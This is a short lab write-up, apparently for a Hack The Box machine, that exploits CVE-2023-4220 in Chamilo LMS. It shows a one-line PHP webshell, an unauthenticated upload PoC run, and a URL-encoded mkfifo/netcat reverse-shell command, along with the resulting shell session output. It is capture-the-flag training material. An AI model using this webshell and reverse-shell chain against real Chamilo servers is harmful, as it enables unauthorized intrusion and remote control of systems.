InfoSec LAB

PermX_Exploitation

Created: 2 min read

CVE-2023-4220

The target Chamilo instance has been suspected to be vulnerable to [[PermX_CVE-2023-4220#[CVE-2023-4220](https //nvd.nist.gov/vuln/detail/CVE-2023-4220)|CVE-2023-4220]] due to the outdated version; 1.11.24

┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ cat webshell.php                               
# Take input from the url paramter. shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>

I have prepared a PHP webshell

┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ python3 main.py -u http://lms.permx.htb/ -a webshell
 
Enter the name of the webshell file that will be placed on the target server (default: webshell.php): webshell.php
 
[+] Upload successfull [+]
 
Webshell URL: http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=<command>

Running the exploit script

┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ curl http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Code execution confirmed

┌──(kali㉿kali)-[~/…/htb/labs/permx/chamilo-lms-unauthenticated-big-upload-rce-poc]
└─$ curl http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.143%209999%20%3E%2Ftmp%2Ff

Sending a URL-encoded reverse shell command

┌──(kali㉿kali)-[~/archive/htb/labs/permx]
└─$ nnc 9999                                                                             
listening on [any] 9999 ...
connect to [10.10.14.143] from (UNKNOWN) [10.10.11.23] 38934
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
permx
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.23  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:fe94:9461  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:fe94:9461  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:94:94:61  txqueuelen 1000  (Ethernet)
        RX packets 11493968  bytes 1927319365 (1.9 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10647216  bytes 4889701732 (4.8 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10103  bytes 1123423 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10103  bytes 1123423 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data account via exploiting [[PermX_CVE-2023-4220#[CVE-2023-4220](https //nvd.nist.gov/vuln/detail/CVE-2023-4220)|CVE-2023-4220]]

Interactive Graph View

Backlinks